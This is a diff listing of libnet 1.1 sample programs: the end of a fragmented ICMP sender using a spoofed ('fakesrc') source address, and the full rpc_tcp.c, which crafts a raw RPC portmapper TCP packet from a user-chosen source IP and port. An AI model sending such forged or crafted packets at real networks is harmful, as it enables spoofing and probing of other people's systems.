|
147
|
+
if (c == -1)
|
148
|
+
{
|
149
|
+
fprintf(stderr, "Write error: %s\n", libnet_geterror(l));
|
150
|
+
}
|
151
|
+
|
152
|
+
/* tcpdump-style jonks. */
|
153
|
+
printf("%s > %s: (frag 666:%d@%d%s)\n", libnet_addr2name4(fakesrc,0),
|
154
|
+
argv[1], LIBNET_ICMPV4_ECHO_H + len, offset, flags ? "+" : "");
|
155
|
+
}
|
156
|
+
|
157
|
+
libnet_stats(l, &ls);
|
158
|
+
fprintf(stderr, "Packets sent: %lld\n"
|
159
|
+
"Packet errors: %lld\n"
|
160
|
+
"Bytes written: %lld\n",
|
161
|
+
ls.packets_sent, ls.packet_errors, ls.bytes_written);
|
162
|
+
libnet_destroy(l);
|
163
|
+
free(data);
|
164
|
+
return (EXIT_SUCCESS);
|
165
|
+
bad:
|
166
|
+
libnet_destroy(l);
|
167
|
+
free(data);
|
168
|
+
return (EXIT_FAILURE);
|
169
|
+
}
|
170
|
+
|
171
|
+
/* EOF */
|
@@ -0,0 +1,214 @@
|
|
1
|
+
/*
|
2
|
+
* $Id: rpc_tcp.c,v 1.2 2004/01/03 20:31:01 mike Exp $
|
3
|
+
*
|
4
|
+
* libnet 1.1
|
5
|
+
* rpc_tcp.c - Build an RPC TCP packet
|
6
|
+
*
|
7
|
+
* Copyright (c) 1998 - 2004 Mike D. Schiffman <mike@infonexus.com>
|
8
|
+
* All rights reserved.
|
9
|
+
*
|
10
|
+
* Redistribution and use in source and binary forms, with or without
|
11
|
+
* modification, are permitted provided that the following conditions
|
12
|
+
* are met:
|
13
|
+
* 1. Redistributions of source code must retain the above copyright
|
14
|
+
* notice, this list of conditions and the following disclaimer.
|
15
|
+
* 2. Redistributions in binary form must reproduce the above copyright
|
16
|
+
* notice, this list of conditions and the following disclaimer in the
|
17
|
+
* documentation and/or other materials provided with the distribution.
|
18
|
+
*
|
19
|
+
* THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
|
20
|
+
* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
|
21
|
+
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
|
22
|
+
* ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
|
23
|
+
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
|
24
|
+
* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
|
25
|
+
* OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
|
26
|
+
* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
|
27
|
+
* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
|
28
|
+
* OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
|
29
|
+
* SUCH DAMAGE.
|
30
|
+
*
|
31
|
+
*/
|
32
|
+
|
33
|
+
#if (HAVE_CONFIG_H)
|
34
|
+
#include "../include/config.h"
|
35
|
+
#endif
|
36
|
+
#include "./libnet_test.h"
|
37
|
+
|
38
|
+
int
|
39
|
+
main(int argc, char **argv)
|
40
|
+
{
|
41
|
+
int c;
|
42
|
+
u_char *cp;
|
43
|
+
libnet_t *l;
|
44
|
+
libnet_ptag_t t;
|
45
|
+
char *payload;
|
46
|
+
u_short payload_s;
|
47
|
+
u_long src_ip, dst_ip;
|
48
|
+
u_short src_prt, dst_prt;
|
49
|
+
char errbuf[LIBNET_ERRBUF_SIZE];
|
50
|
+
|
51
|
+
printf("libnet 1.1 packet shaping: RPC TCP[raw]\n");
|
52
|
+
|
53
|
+
/*
|
54
|
+
* Initialize the library. Root priviledges are required.
|
55
|
+
*/
|
56
|
+
l = libnet_init(
|
57
|
+
LIBNET_RAW4, /* injection type */
|
58
|
+
NULL, /* network interface */
|
59
|
+
errbuf); /* errbuf */
|
60
|
+
|
61
|
+
if (l == NULL)
|
62
|
+
{
|
63
|
+
fprintf(stderr, "libnet_init() failed: %s", errbuf);
|
64
|
+
exit(EXIT_FAILURE);
|
65
|
+
}
|
66
|
+
|
67
|
+
src_ip = 0;
|
68
|
+
dst_ip = 0;
|
69
|
+
src_prt = 0;
|
70
|
+
dst_prt = 0;
|
71
|
+
payload = NULL;
|
72
|
+
payload_s = 0;
|
73
|
+
while((c = getopt(argc, argv, "d:s:p:")) != EOF)
|
74
|
+
{
|
75
|
+
switch (c)
|
76
|
+
{
|
77
|
+
/*
|
78
|
+
* We expect the input to be of the form `ip.ip.ip.ip.port`. We
|
79
|
+
* point cp to the last dot of the IP address/port string and
|
80
|
+
* then seperate them with a NULL byte. The optarg now points to
|
81
|
+
* just the IP address, and cp points to the port.
|
82
|
+
*/
|
83
|
+
case 'd':
|
84
|
+
if (!(cp = strrchr(optarg, '.')))
|
85
|
+
{
|
86
|
+
usage(argv[0]);
|
87
|
+
}
|
88
|
+
*cp++ = 0;
|
89
|
+
dst_prt = (u_short)atoi(cp);
|
90
|
+
if ((dst_ip = libnet_name2addr4(l, optarg, LIBNET_RESOLVE)) == -1)
|
91
|
+
{
|
92
|
+
fprintf(stderr, "Bad destination IP address: %s\n", optarg);
|
93
|
+
exit(EXIT_FAILURE);
|
94
|
+
}
|
95
|
+
break;
|
96
|
+
break;
|
97
|
+
case 'p':
|
98
|
+
payload = optarg;
|
99
|
+
payload_s = strlen(payload);
|
100
|
+
break;
|
101
|
+
case 's':
|
102
|
+
if (!(cp = strrchr(optarg, '.')))
|
103
|
+
{
|
104
|
+
usage(argv[0]);
|
105
|
+
}
|
106
|
+
*cp++ = 0;
|
107
|
+
src_prt = (u_short)atoi(cp);
|
108
|
+
if ((src_ip = libnet_name2addr4(l, optarg, LIBNET_RESOLVE)) == -1)
|
109
|
+
{
|
110
|
+
fprintf(stderr, "Bad source IP address: %s\n", optarg);
|
111
|
+
exit(EXIT_FAILURE);
|
112
|
+
}
|
113
|
+
break;
|
114
|
+
}
|
115
|
+
}
|
116
|
+
if (!src_ip || !src_prt || !dst_ip || !dst_prt)
|
117
|
+
{
|
118
|
+
usage(argv[0]);
|
119
|
+
exit(EXIT_FAILURE);
|
120
|
+
}
|
121
|
+
|
122
|
+
t = libnet_build_rpc_call(
|
123
|
+
LIBNET_RPC_LAST_FRAG | LIBNET_RPC_CALL_TCP_H,
|
124
|
+
0x10e70082,
|
125
|
+
LIBNET_PMAP_PROGRAM,
|
126
|
+
2,
|
127
|
+
LIBNET_PMAP_PROC_DUMP,
|
128
|
+
0,
|
129
|
+
0,
|
130
|
+
NULL,
|
131
|
+
0,
|
132
|
+
0,
|
133
|
+
NULL,
|
134
|
+
payload,
|
135
|
+
payload_s,
|
136
|
+
l,
|
137
|
+
0);
|
138
|
+
if (t == -1)
|
139
|
+
{
|
140
|
+
fprintf(stderr, "Can't build RPC header: %s\n", libnet_geterror(l));
|
141
|
+
goto bad;
|
142
|
+
}
|
143
|
+
|
144
|
+
t = libnet_build_tcp(
|
145
|
+
src_prt, /* source port */
|
146
|
+
dst_prt, /* destination port */
|
147
|
+
0x01010101, /* sequence number */
|
148
|
+
0x02020202, /* acknowledgement num */
|
149
|
+
TH_ACK, /* control flags */
|
150
|
+
32767, /* window size */
|
151
|
+
0, /* checksum */
|
152
|
+
0, /* urgent pointer */
|
153
|
+
LIBNET_TCP_H + 44 + payload_s, /* TCP packet size */
|
154
|
+
NULL, /* payload */
|
155
|
+
0, /* payload size */
|
156
|
+
l, /* libnet handle */
|
157
|
+
0); /* libnet id */
|
158
|
+
if (t == -1)
|
159
|
+
{
|
160
|
+
fprintf(stderr, "Can't build TCP header: %s\n", libnet_geterror(l));
|
161
|
+
goto bad;
|
162
|
+
}
|
163
|
+
|
164
|
+
t = libnet_build_ipv4(
|
165
|
+
LIBNET_IPV4_H + LIBNET_TCP_H + 44 + payload_s,/* length */
|
166
|
+
0, /* TOS */
|
167
|
+
242, /* IP ID */
|
168
|
+
0, /* IP Frag */
|
169
|
+
64, /* TTL */
|
170
|
+
IPPROTO_TCP, /* protocol */
|
171
|
+
0, /* checksum */
|
172
|
+
src_ip, /* source IP */
|
173
|
+
dst_ip, /* destination IP */
|
174
|
+
NULL, /* payload */
|
175
|
+
0, /* payload size */
|
176
|
+
l, /* libnet handle */
|
177
|
+
0); /* libnet id */
|
178
|
+
if (t == -1)
|
179
|
+
{
|
180
|
+
fprintf(stderr, "Can't build IP header: %s\n", libnet_geterror(l));
|
181
|
+
goto bad;
|
182
|
+
}
|
183
|
+
|
184
|
+
/*
|
185
|
+
* Write it to the wire.
|
186
|
+
*/
|
187
|
+
c = libnet_write(l);
|
188
|
+
if (c == -1)
|
189
|
+
{
|
190
|
+
fprintf(stderr, "Write error: %s\n", libnet_geterror(l));
|
191
|
+
goto bad;
|
192
|
+
}
|
193
|
+
else
|
194
|
+
{
|
195
|
+
fprintf(stderr, "Wrote %d byte RPC TCP packet; check the wire.\n", c);
|
196
|
+
}
|
197
|
+
libnet_destroy(l);
|
198
|
+
return (EXIT_SUCCESS);
|
199
|
+
bad:
|
200
|
+
libnet_destroy(l);
|
201
|
+
return (EXIT_FAILURE);
|
202
|
+
}
|
203
|
+
|
204
|
+
|
205
|
+
void
|
206
|
+
usage(char *name)
|
207
|
+
{
|
208
|
+
fprintf(stderr,
|
209
|
+
"usage: %s -s source_ip.source_port -d destination_ip.destination_port"
|
210
|
+
" [-p payload]\n",
|
211
|
+
name);
|
212
|
+
}
|
213
|
+
|
214
|
+
/* EOF */
|